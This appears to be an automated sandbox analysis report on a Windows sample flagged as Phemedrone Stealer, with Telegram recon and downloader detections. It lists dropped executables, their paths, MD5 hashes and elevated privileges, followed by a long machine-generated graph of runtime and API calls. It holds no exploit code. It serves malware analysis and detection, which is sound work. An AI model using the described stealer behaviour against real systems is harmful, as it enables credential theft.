                                                            Imagebase:0x340000
                                                            File size:2'605'056 bytes
                                                            MD5 hash:5D4392B56AA4EBAC400BBE86FE5D0767
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:15:57:49
                                                            Start date:04/10/2023
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:15:57:50
                                                            Start date:04/10/2023
                                                            Path:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\ProgramData\Start Menu\G5K9HNJ7.exe"
                                                            Imagebase:0x210000
                                                            File size:889'416 bytes
                                                            MD5 hash:53406E9988306CBD4537677C5336ABA4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:3
                                                            Start time:15:57:50
                                                            Start date:04/10/2023
                                                            Path:C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe"
                                                            Imagebase:0x480000
                                                            File size:84'992 bytes
                                                            MD5 hash:AE881BAA8C3A00A94E5994826BDAC3AA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:15:57:52
                                                            Start date:04/10/2023
                                                            Path:C:\6c8944922f7b98d0b6cd82b768\Setup.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\6c8944922f7b98d0b6cd82b768\\Setup.exe /x86 /x64 /ia64 /web
                                                            Imagebase:0x30000
                                                            File size:78'152 bytes
                                                            MD5 hash:006F8A615020A4A17F5E63801485DF46
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:false

                                                            Target ID:6
                                                            Start time:15:57:57
                                                            Start date:04/10/2023
                                                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo1.rtf
                                                            Imagebase:0x760000
                                                            File size:1'620'872 bytes
                                                            MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:11
                                                            Start time:15:58:00
                                                            Start date:04/10/2023
                                                            Path:C:\Windows\splwow64.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\splwow64.exe 12288
                                                            Imagebase:0x7ff71aab0000
                                                            File size:163'840 bytes
                                                            MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                              Execution Graph

                                                              Execution Coverage:17.2%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:11.7%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:19
65 API calls 15907->15908 15908->15902 15909->15817 15910->15732 15911->15747 15914 229fbd 15912->15914 15916 22a02a 15914->15916 15922 22db59 15914->15922 15915 22a128 15915->15529 15915->15531 15916->15915 15917 22db59 76 API calls _parse_cmdline 15916->15917 15917->15916 15919 22ca49 15918->15919 15921 22ca50 15918->15921 16246 22c8a1 15919->16246 15921->15525 15925 22db01 15922->15925 15928 2292e9 15925->15928 15929 229349 15928->15929 15930 2292fc 15928->15930 15929->15914 15936 22a753 15930->15936 15933 229329 15933->15929 15956 22c589 15933->15956 15937 22a6d5 __getptd_noexit 66 API calls 15936->15937 15938 22a75b 15937->15938 15939 229301 15938->15939 15940 229aca __amsg_exit 66 API calls 15938->15940 15939->15933 15941 22cd37 15939->15941 15940->15939 15942 22cd43 __commit 15941->15942 15943 22a753 __getptd 66 API calls 15942->15943 15944 22cd48 15943->15944 15945 22cd76 15944->15945 15946 22cd5a 15944->15946 15947 22d1bd __lock 66 API calls 15945->15947 15948 22a753 __getptd 66 API calls 15946->15948 15949 22cd7d 15947->15949 15950 22cd5f 15948->15950 15972 22cce5 15949->15972 15953 22cd6d __commit 15950->15953 15955 229aca __amsg_exit 66 API calls 15950->15955 15953->15933 15955->15953 15957 22c595 __commit 15956->15957 15958 22a753 __getptd 66 API calls 15957->15958 15959 22c59a 15958->15959 15960 22d1bd __lock 66 API calls 15959->15960 15968 22c5ac 15959->15968 15961 22c5ca 15960->15961 15962 22c613 15961->15962 15963 22c5e1 InterlockedDecrement 15961->15963 15964 22c5fb InterlockedIncrement 15961->15964 16242 22c624 15962->16242 15963->15964 15967 22c5ec 15963->15967 15964->15962 15966 229aca __amsg_exit 66 API calls 15969 22c5ba __commit 15966->15969 15967->15964 15970 22c318 _free 66 API calls 15967->15970 15968->15966 15968->15969 15969->15929 15971 22c5fa 15970->15971 15971->15964 15973 22ccf2 15972->15973 15979 22cd27 15972->15979 15974 22ca63 ___addlocaleref 8 API calls 15973->15974 15973->15979 15975 22cd08 15974->15975 15975->15979 15983 
22caf7 15975->15983 15980 22cda4 15979->15980 16241 22d0da LeaveCriticalSection 15980->16241 15982 22cdab 15982->15950 15984 22cb8b 15983->15984 15985 22cb08 InterlockedDecrement 15983->15985 15984->15979 15997 22cb95 15984->15997 15986 22cb20 15985->15986 15987 22cb1d InterlockedDecrement 15985->15987 15988 22cb2a InterlockedDecrement 15986->15988 15989 22cb2d 15986->15989 15987->15986 15988->15989 15990 22cb37 InterlockedDecrement 15989->15990 15991 22cb3a 15989->15991 15990->15991 15992 22cb44 InterlockedDecrement 15991->15992 15993 22cb47 15991->15993 15992->15993 15994 22cb60 InterlockedDecrement 15993->15994 15995 22cb7b InterlockedDecrement 15993->15995 15996 22cb70 InterlockedDecrement 15993->15996 15994->15993 15995->15984 15996->15993 15998 22cc19 15997->15998 16006 22cbac 15997->16006 15999 22c318 _free 66 API calls 15998->15999 16026 22cc66 15998->16026 16000 22cc3a 15999->16000 16003 22c318 _free 66 API calls 16000->16003 16002 22cbe0 16004 22cc01 16002->16004 16016 22c318 _free 66 API calls 16002->16016 16007 22cc4d 16003->16007 16009 22c318 _free 66 API calls 16004->16009 16006->15998 16006->16002 16012 22c318 _free 66 API calls 16006->16012 16015 22c318 _free 66 API calls 16007->16015 16008 22cc8f 16010 22ccd4 16008->16010 16022 22c318 66 API calls _free 16008->16022 16017 22cc0e 16009->16017 16013 22c318 _free 66 API calls 16010->16013 16011 22c318 _free 66 API calls 16011->16008 16014 22cbd5 16012->16014 16018 22ccda 16013->16018 16027 230ebb 16014->16027 16020 22cc5b 16015->16020 16021 22cbf6 16016->16021 16023 22c318 _free 66 API calls 16017->16023 16018->15979 16024 22c318 _free 66 API calls 16020->16024 16055 230e4d 16021->16055 16022->16008 16023->15998 16024->16026 16026->16008 16067 230ad1 16026->16067 16028 230ecc 16027->16028 16054 230fb5 16027->16054 16029 230edd 16028->16029 16030 22c318 _free 66 API calls 16028->16030 16031 230eef 16029->16031 16032 22c318 _free 66 API calls 16029->16032 16030->16029 16033 230f01 16031->16033 16034 
22c318 _free 66 API calls 16031->16034 16032->16031 16035 230f13 16033->16035 16036 22c318 _free 66 API calls 16033->16036 16034->16033 16037 230f25 16035->16037 16038 22c318 _free 66 API calls 16035->16038 16036->16035 16039 230f37 16037->16039 16040 22c318 _free 66 API calls 16037->16040 16038->16037 16041 230f49 16039->16041 16042 22c318 _free 66 API calls 16039->16042 16040->16039 16043 230f5b 16041->16043 16044 22c318 _free 66 API calls 16041->16044 16042->16041 16045 230f6d 16043->16045 16046 22c318 _free 66 API calls 16043->16046 16044->16043 16047 22c318 _free 66 API calls 16045->16047 16048 230f7f 16045->16048 16046->16045 16047->16048 16049 22c318 _free 66 API calls 16048->16049 16051 230f91 16048->16051 16049->16051 16050 230fa3 16053 22c318 _free 66 API calls 16050->16053 16050->16054 16051->16050 16052 22c318 _free 66 API calls 16051->16052 16052->16050 16053->16054 16054->16002 16056 230e5a 16055->16056 16066 230eb2 16055->16066 16057 230e6a 16056->16057 16059 22c318 _free 66 API calls 16056->16059 16058 230e7c 16057->16058 16060 22c318 _free 66 API calls 16057->16060 16061 230e8e 16058->16061 16062 22c318 _free 66 API calls 16058->16062 16059->16057 16060->16058 16063 22c318 _free 66 API calls 16061->16063 16064 230ea0 16061->16064 16062->16061 16063->16064 16065 22c318 _free 66 API calls 16064->16065 16064->16066 16065->16066 16066->16004 16068 230ae2 16067->16068 16240 22cc84 16067->16240 16069 22c318 _free 66 API calls 16068->16069 16070 230aea 16069->16070 16071 22c318 _free 66 API calls 16070->16071 16072 230af2 16071->16072 16073 22c318 _free 66 API calls 16072->16073 16074 230afa 16073->16074 16075 22c318 _free 66 API calls 16074->16075 16076 230b02 16075->16076 16077 22c318 _free 66 API calls 16076->16077 16078 230b0a 16077->16078 16079 22c318 _free 66 API calls 16078->16079 16080 230b12 16079->16080 16081 22c318 _free 66 API calls 16080->16081 16082 230b19 16081->16082 16083 22c318 _free 66 API calls 16082->16083 16084 230b21 16083->16084 
16085 22c318 _free 66 API calls 16084->16085 16086 230b29 16085->16086 16087 22c318 _free 66 API calls 16086->16087 16088 230b31 16087->16088 16089 22c318 _free 66 API calls 16088->16089 16090 230b39 16089->16090 16091 22c318 _free 66 API calls 16090->16091 16092 230b41 16091->16092 16093 22c318 _free 66 API calls 16092->16093 16094 230b49 16093->16094 16095 22c318 _free 66 API calls 16094->16095 16096 230b51 16095->16096 16097 22c318 _free 66 API calls 16096->16097 16098 230b59 16097->16098 16099 22c318 _free 66 API calls 16098->16099 16100 230b61 16099->16100 16101 22c318 _free 66 API calls 16100->16101 16102 230b6c 16101->16102 16103 22c318 _free 66 API calls 16102->16103 16104 230b74 16103->16104 16105 22c318 _free 66 API calls 16104->16105 16106 230b7c 16105->16106 16107 22c318 _free 66 API calls 16106->16107 16108 230b84 16107->16108 16109 22c318 _free 66 API calls 16108->16109 16110 230b8c 16109->16110 16111 22c318 _free 66 API calls 16110->16111 16112 230b94 16111->16112 16113 22c318 _free 66 API calls 16112->16113 16114 230b9c 16113->16114 16115 22c318 _free 66 API calls 16114->16115 16240->16011 16241->15982 16245 22d0da LeaveCriticalSection 16242->16245 16244 22c62b 16244->15968 16245->16244 16247 22c8ad __commit 16246->16247 16248 22a753 __getptd 66 API calls 16247->16248 16249 22c8b6 16248->16249 16250 22c589 __setmbcp 68 API calls 16249->16250 16251 22c8c0 16250->16251 16277 22c632 16251->16277 16254 22dbda __malloc_crt 66 API calls 16255 22c8e1 16254->16255 16256 22ca00 __commit 16255->16256 16284 22c6b3 16255->16284 16256->15921 16259 22c911 InterlockedDecrement 16260 22c932 InterlockedIncrement 16259->16260 16261 22c921 16259->16261 16260->16256 16264 22c948 16260->16264 16261->16260 16267 22c318 _free 66 API calls 16261->16267 16262 22ca20 16266 22b059 __commit 66 API calls 16262->16266 16263 22ca0d 16263->16256 16263->16262 16265 22c318 _free 66 API calls 16263->16265 16264->16256 16269 22d1bd __lock 66 API calls 16264->16269 16265->16262 
16266->16256 16268 22c931 16267->16268 16268->16260 16271 22c95c InterlockedDecrement 16269->16271 16272 22c9eb InterlockedIncrement 16271->16272 16273 22c9d8 16271->16273 16294 22ca02 16272->16294 16273->16272 16275 22c318 _free 66 API calls 16273->16275 16276 22c9ea 16275->16276 16276->16272 16278 2292e9 _LocaleUpdate::_LocaleUpdate 76 API calls 16277->16278 16279 22c646 16278->16279 16280 22c651 GetOEMCP 16279->16280 16281 22c66f 16279->16281 16283 22c661 16280->16283 16282 22c674 GetACP 16281->16282 16281->16283 16282->16283 16283->16254 16283->16256 16285 22c632 getSystemCP 78 API calls 16284->16285 16286 22c6d3 16285->16286 16287 22c6de setSBCS 16286->16287 16289 22c722 IsValidCodePage 16286->16289 16292 22c747 _memset __setmbcp_nolock 16286->16292 16288 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16287->16288 16290 22c89a 16288->16290 16289->16287 16291 22c734 GetCPInfo 16289->16291 16290->16259 16290->16263 16291->16287 16291->16292 16297 22c3f4 GetCPInfo 16292->16297 16358 22d0da LeaveCriticalSection 16294->16358 16296 22ca09 16296->16256 16298 22c4dc 16297->16298 16300 22c428 _memset 16297->16300 16303 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16298->16303 16307 230a8c 16300->16307 16305 22c582 16303->16305 16305->16292 16306 230955 ___crtLCMapStringA 82 API calls 16306->16298 16308 2292e9 _LocaleUpdate::_LocaleUpdate 76 API calls 16307->16308 16309 230a9f 16308->16309 16317 2309a0 16309->16317 16312 230955 16313 2292e9 _LocaleUpdate::_LocaleUpdate 76 API calls 16312->16313 16314 230968 16313->16314 16334 230769 16314->16334 16318 2309c9 MultiByteToWideChar 16317->16318 16319 2309be 16317->16319 16322 2309f6 16318->16322 16329 2309f2 16318->16329 16319->16318 16320 230a0b _wcslwr_s_l_stat _memset 16325 230a44 MultiByteToWideChar 16320->16325 16320->16329 16321 2291d5 
__ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16323 22c497 16321->16323 16322->16320 16324 22cdb5 _malloc 66 API calls 16322->16324 16323->16312 16324->16320 16326 230a6b 16325->16326 16327 230a5a GetStringTypeW 16325->16327 16330 2292c4 16326->16330 16327->16326 16329->16321 16331 2292e1 16330->16331 16332 2292d0 16330->16332 16331->16329 16332->16331 16333 22c318 _free 66 API calls 16332->16333 16333->16331 16336 230787 MultiByteToWideChar 16334->16336 16337 2307e5 16336->16337 16341 2307ec 16336->16341 16338 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16337->16338 16340 22c4b7 16338->16340 16339 230839 MultiByteToWideChar 16342 230931 16339->16342 16343 230852 LCMapStringW 16339->16343 16340->16306 16344 22cdb5 _malloc 66 API calls 16341->16344 16348 230805 _wcslwr_s_l_stat 16341->16348 16345 2292c4 __freea 66 API calls 16342->16345 16343->16342 16346 230871 16343->16346 16344->16348 16345->16337 16347 23087b 16346->16347 16351 2308a4 16346->16351 16347->16342 16349 23088f LCMapStringW 16347->16349 16348->16337 16348->16339 16349->16342 16350 2308f3 LCMapStringW 16353 23092b 16350->16353 16354 230909 WideCharToMultiByte 16350->16354 16352 22cdb5 _malloc 66 API calls 16351->16352 16355 2308bf _wcslwr_s_l_stat 16351->16355 16352->16355 16356 2292c4 __freea 66 API calls 16353->16356 16354->16353 16355->16342 16355->16350 16356->16342 16358->16296 16360 22db84 16359->16360 16361 22db8b 16359->16361 16360->16361 16366 22dba9 16360->16366 16362 22b059 __commit 66 API calls 16361->16362 16363 22db90 16362->16363 16364 22affd __commit 11 API calls 16363->16364 16365 22db9a 16364->16365 16365->15543 16366->16365 16367 22b059 __commit 66 API calls 16366->16367 16367->16363 16369 22d5cb _EncodePointerInternal 16368->16369 16369->16369 16370 22d5e5 16369->16370 16370->15557 16374 22d568 16371->16374 
16373 22d5b6 16373->15559 16375 22d574 __commit 16374->16375 16382 22980e 16375->16382 16381 22d595 __commit 16381->16373 16383 22d1bd __lock 66 API calls 16382->16383 16384 229815 16383->16384 16385 22d477 _DecodePointerInternal _DecodePointerInternal 16384->16385 16386 22d526 16385->16386 16387 22d4a5 16385->16387 16396 22d59e 16386->16396 16387->16386 16399 2315bd 16387->16399 16389 22d509 _EncodePointerInternal _EncodePointerInternal 16389->16386 16390 22d4b7 16390->16389 16391 22d4db 16390->16391 16406 22dc75 16390->16406 16391->16386 16393 22dc75 __realloc_crt 70 API calls 16391->16393 16394 22d4f7 _EncodePointerInternal 16391->16394 16395 22d4f1 16393->16395 16394->16389 16395->16386 16395->16394 16432 22981c 16396->16432 16400 2315c8 16399->16400 16401 2315dd HeapSize 16399->16401 16402 22b059 __commit 66 API calls 16400->16402 16401->16390 16403 2315cd 16402->16403 16404 22affd __commit 11 API calls 16403->16404 16405 2315d8 16404->16405 16405->16390 16408 22dc7e 16406->16408 16409 22dcbd 16408->16409 16410 22dc9e Sleep 16408->16410 16411 23168a 16408->16411 16409->16391 16410->16408 16412 2316a0 16411->16412 16413 231695 16411->16413 16415 2316a8 16412->16415 16424 2316b5 16412->16424 16414 22cdb5 _malloc 66 API calls 16413->16414 16416 23169d 16414->16416 16417 22c318 _free 66 API calls 16415->16417 16416->16408 16431 2316b0 __dosmaperr 16417->16431 16418 2316ed 16419 22d44a _malloc _DecodePointerInternal 16418->16419 16421 2316f3 16419->16421 16420 2316bd HeapReAlloc 16420->16424 16420->16431 16422 22b059 __commit 66 API calls 16421->16422 16422->16431 16423 23171d 16426 22b059 __commit 66 API calls 16423->16426 16424->16418 16424->16420 16424->16423 16425 22d44a _malloc _DecodePointerInternal 16424->16425 16428 231705 16424->16428 16425->16424 16427 231722 GetLastError 16426->16427 16427->16431 16429 22b059 __commit 66 API calls 16428->16429 16430 23170a GetLastError 16429->16430 16430->16431 16431->16408 16435 22d0da LeaveCriticalSection 16432->16435 
16434 229823 16434->16381 16435->16434 16437 216c91 GetLastError 16436->16437 16451 216cc4 16436->16451 16438 216c9d 16437->16438 16442 21854a 118 API calls 16438->16442 16439 216e70 16440 216e90 LocalFree 16439->16440 16698 2199d2 16439->16698 16447 216cbd 16440->16447 16442->16447 16443 216cf5 lstrlenW 16445 216d01 CompareStringW 16443->16445 16446 216d3e lstrlenW 16443->16446 16444 216d34 16444->16440 16457 21854a 118 API calls 16444->16457 16445->16446 16445->16451 16448 216d4b CompareStringW 16446->16448 16449 216d8e lstrlenW 16446->16449 16447->15576 16448->16449 16448->16451 16452 216ddb lstrlenW 16449->16452 16453 216d9b CompareStringW 16449->16453 16450 218889 7 API calls 16450->16451 16451->16439 16451->16443 16451->16444 16451->16450 16455 216e08 lstrlenW 16452->16455 16456 216de8 CompareStringW 16452->16456 16453->16451 16453->16452 16458 216e32 lstrlenW 16455->16458 16459 216e15 CompareStringW 16455->16459 16456->16451 16456->16455 16457->16440 16458->16451 16460 216e3f CompareStringW 16458->16460 16459->16451 16459->16458 16460->16451 16711 219ca3 16461->16711 16464 218450 16466 218889 7 API calls 16464->16466 16467 218480 16464->16467 16465 218444 GetLastError 16465->16464 16468 21846f 16466->16468 16467->15572 16468->16467 16718 2185b2 16468->16718 16773 219cfe 16470->16773 16473 21854a 118 API calls 16474 215af6 16473->16474 16474->15620 16475 216123 16474->16475 16476 2161e5 16475->16476 16477 21614a 16475->16477 16479 215b19 16476->16479 16482 21a46e 12 API calls 16476->16482 16480 216204 16477->16480 16481 21616d 16477->16481 16809 219dc6 16477->16809 16479->15620 16488 216ef5 16479->16488 16484 21854a 118 API calls 16480->16484 16481->16477 16485 21620b 16481->16485 16487 2161e2 16481->16487 16829 219ef3 16481->16829 16833 21a46e 16481->16833 16482->16479 16484->16476 16485->16480 16487->16476 16922 216f5c 16488->16922 16491 216f0f 16494 21854a 118 API calls 16491->16494 16499 215b53 16494->16499 16495 216f35 16954 217c12 16495->16954 16498 
2184c7 118 API calls 16498->16499 16499->15599 16499->15620 16501 216251 16500->16501 16510 216260 16500->16510 16505 21854a 118 API calls 16501->16505 16518 2163fa 16501->16518 16502 2162fd 16503 216353 16502->16503 16504 216307 GetProcessHeap HeapAlloc 16502->16504 17313 21676f 16503->17313 16504->16503 16508 216330 16504->16508 16534 2163f3 16505->16534 16507 219dc6 52 API calls 16507->16510 16508->16501 16510->16501 16510->16502 16510->16507 16523 216289 16510->16523 16511 2168fb 10 API calls 16511->16518 16512 219ef3 2 API calls 16512->16523 16513 2184c7 118 API calls 16515 216379 16513->16515 16514 215b83 16514->15606 16514->15620 17333 2169b0 16515->17333 16516 216421 GetProcessHeap HeapFree 16516->16514 16519 216437 16516->16519 16518->16514 16518->16516 16520 21a46e 12 API calls 16518->16520 16522 219a29 GetLastError 16519->16522 16520->16518 16521 2163d8 16524 2169b0 SendMessageA 16521->16524 16522->16514 16523->16502 16523->16508 16523->16510 16523->16512 16525 2163dd 16524->16525 17379 2169e3 16525->17379 16527 21639b 16530 216445 16527->16530 16535 216381 16527->16535 17361 21a003 16527->17361 16528 2169e3 EnterCriticalSection LeaveCriticalSection 16528->16535 16532 21644d 16530->16532 16533 21854a 118 API calls 16532->16533 16533->16534 16534->16511 16535->16501 16535->16521 16535->16527 16535->16528 16535->16532 17338 21a222 16535->17338 16537 215956 16536->16537 16538 215979 16536->16538 16537->16538 16541 215965 16537->16541 16539 215990 16538->16539 16540 21597e 16538->16540 16544 2184c7 118 API calls 16539->16544 16543 2184c7 118 API calls 16540->16543 16542 2184c7 118 API calls 16541->16542 16545 215974 16542->16545 16546 21598b 16543->16546 16547 21599c 16544->16547 16545->15614 16546->15614 16547->15614 16549 215e2f _memset 16548->16549 16550 2195c3 10 API calls 16549->16550 16551 215e44 16550->16551 16578 215e4a 16551->16578 18260 219663 16551->18260 16554 21854a 118 API calls 16555 216043 16554->16555 16558 21607b 16555->16558 16560 219663 
12 API calls 16555->16560 16556 2199d2 6 API calls 16557 215e77 16556->16557 16559 215e87 SetEnvironmentVariableW 16557->16559 16557->16578 16561 218e6f 3 API calls 16558->16561 16563 216089 16558->16563 16564 215ec9 SetEnvironmentVariableW 16559->16564 16565 215e9e GetLastError 16559->16565 16560->16558 16561->16563 16562 216097 16569 2160a1 16562->16569 16570 218e6f 3 API calls 16562->16570 16563->16562 16566 218e6f 3 API calls 16563->16566 16565->16578 16566->16562 16569->15620 16570->16569 16578->16554 16591 215a77 GetEnvironmentVariableW 16590->16591 16592 229284 16591->16592 18287 22bf3c 16592->18287 16594 215aa8 16595 218889 16594->16595 16596 21889d 16595->16596 16599 2188a3 16595->16599 18526 219a43 GetProcessHeap HeapSize 16596->18526 16598 2188b7 lstrlenW 16600 2188c2 16598->16600 16599->16598 16599->16600 16601 2188aa 16599->16601 16600->16601 16602 2187eb 4 API calls 16600->16602 16601->15568 16602->16601 16604 218590 16603->16604 16605 21855e 16603->16605 16606 2185a8 16604->16606 16608 218e6f 3 API calls 16604->16608 16605->16604 18527 218c9a 16605->18527 16606->15571 16608->16606 16610 2184c7 118 API calls 16610->16604 16612 215bcc 16611->16612 16613 21690c 16611->16613 16612->15579 16612->15580 16614 21691a EnterCriticalSection LeaveCriticalSection 16613->16614 16619 216958 16613->16619 16615 216946 16614->16615 16616 21693b PostMessageW 16614->16616 16615->16619 16620 21694f WaitForSingleObject 16615->16620 16616->16615 16617 216979 16621 216988 16617->16621 16622 218e6f 3 API calls 16617->16622 16618 21696c DeleteCriticalSection 16618->16617 16619->16617 16619->16618 16620->16619 16623 216997 CloseHandle 16621->16623 16624 21699a 16621->16624 16622->16621 16623->16624 16624->16612 16625 2169a3 CloseHandle 16624->16625 16625->16612 16627 21a422 16626->16627 16628 21a41b CloseHandle 16626->16628 16629 21a437 GetProcessHeap HeapFree 16627->16629 16630 21a448 16627->16630 16628->16627 16629->16630 16631 21a443 16629->16631 16632 21a455 GetProcessHeap 
HeapFree 16630->16632 16634 218e6f 3 API calls 16630->16634 16633 219a29 GetLastError 16631->16633 16635 21a463 16632->16635 16633->16630 16634->16632 16635->15580 16637 216472 16636->16637 16638 2164cd 16636->16638 16639 216499 GetProcessHeap HeapFree 16637->16639 16644 218e6f 3 API calls 16637->16644 16646 216497 16637->16646 18595 219c21 16637->18595 16638->15589 16641 2164b1 16639->16641 16642 2164b6 16639->16642 16643 219a29 GetLastError 16641->16643 16642->16638 18606 2192bb 16642->18606 16643->16642 16644->16637 16646->16639 16648 215cfd 16647->16648 16650 215cf6 16647->16650 16648->16650 16651 215d24 16648->16651 16649 219166 6 API calls 16652 215d8c 16649->16652 16650->16649 16653 219166 6 API calls 16651->16653 16654 215da1 16652->16654 16655 215d90 16652->16655 16656 215d31 16653->16656 16658 215da9 16654->16658 16659 215dcd 16654->16659 16657 21854a 118 API calls 16655->16657 16656->16655 16661 215d35 16656->16661 16662 215d9c 16657->16662 16663 219166 6 API calls 16658->16663 16660 2292a7 99 API calls 16659->16660 16665 215d53 16660->16665 18643 218dae 16661->18643 16667 215df6 16662->16667 16669 218e6f 3 API calls 16662->16669 16664 215dbc MessageBoxW 16663->16664 16664->16665 16665->16662 16673 218e6f 3 API calls 16665->16673 16670 215e04 16667->16670 16674 218e6f 3 API calls 16667->16674 16669->16667 16670->15588 16671 215d47 16675 21854a 118 API calls 16671->16675 16672 215d5b 16676 218abb 6 API calls 16672->16676 16673->16662 16674->16670 16675->16665 16677 215d67 16676->16677 16677->16654 16678 215d6b 16677->16678 16679 21854a 118 API calls 16678->16679 16679->16665 18652 232fe1 16680->18652 16687 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16688 215c14 16687->16688 16689 218e9c GetTimeZoneInformation GetSystemTime SystemTimeToTzSpecificLocalTime 16688->16689 16690 218b7e 112 API calls 16689->16690 16691 218f06 16690->16691 16692 2291d5 
__ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16691->16692 16693 215c25 16692->16693 16693->15601 16693->15603 16695 218e8a 16694->16695 16696 218e8e 16694->16696 16695->15605 16697 219a29 GetLastError 16696->16697 16697->16695 16699 2199dd 16698->16699 16701 219a21 16699->16701 16702 2199e8 GetModuleFileNameW 16699->16702 16706 2187eb 16699->16706 16701->16444 16703 219a04 GetLastError 16702->16703 16704 2199f7 16702->16704 16705 219a00 16703->16705 16704->16699 16704->16705 16705->16701 16707 218820 16706->16707 16708 2187f7 16706->16708 16707->16699 16709 218811 GetProcessHeap HeapAlloc 16708->16709 16710 218800 GetProcessHeap HeapReAlloc 16708->16710 16709->16707 16710->16707 16738 219926 16711->16738 16714 219cc1 CreateFileW 16715 219cda 16714->16715 16716 21843a 16715->16716 16717 218e6f 3 API calls 16715->16717 16716->16464 16716->16465 16717->16716 16719 2185f5 16718->16719 16732 2186d9 16718->16732 16720 218601 GetModuleFileNameW 16719->16720 16719->16732 16721 218619 _memset 16720->16721 16759 219a63 16721->16759 16722 2186f2 16725 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16722->16725 16724 218e6f 3 API calls 16724->16722 16726 218700 16725->16726 16726->16467 16729 218671 _memset 16730 218e9c 115 API calls 16729->16730 16731 21868d 16730->16731 16731->16732 16733 2184c7 118 API calls 16731->16733 16732->16722 16732->16724 16734 2186a5 16733->16734 16735 2184c7 118 API calls 16734->16735 16736 2186c8 16735->16736 16737 2184c7 118 API calls 16736->16737 16737->16732 16739 218889 7 API calls 16738->16739 16742 219938 16739->16742 16740 219972 16740->16714 16740->16715 16741 218e6f 3 API calls 16741->16740 16744 219960 16742->16744 16745 219871 16742->16745 16744->16740 16744->16741 16747 21988e 16745->16747 16746 219913 16746->16744 16747->16746 16750 2198b5 
